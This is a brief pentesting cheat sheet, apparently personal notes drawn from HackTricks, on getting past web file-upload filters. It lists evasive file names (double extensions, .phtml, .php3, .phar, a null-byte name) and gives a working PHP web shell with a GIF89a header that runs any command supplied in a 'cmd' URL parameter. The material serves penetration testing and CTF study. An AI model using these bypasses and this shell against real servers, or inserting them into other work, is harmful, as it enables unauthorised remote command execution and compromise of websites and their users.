File Upload

Ref: https://book.hacktricks.xyz/pentesting-web/file-upload

Bypass Image Upload

GIF

Bypass extension checking

save name with this-->

shell.php.png
shell.phtml.png
shell.php3
shell.phar
shell.php%00.png

Bypass image signature

GIF89a;
<?php
echo "<pre>";
passthru($_GET['cmd']);
echo "</pre>";
?>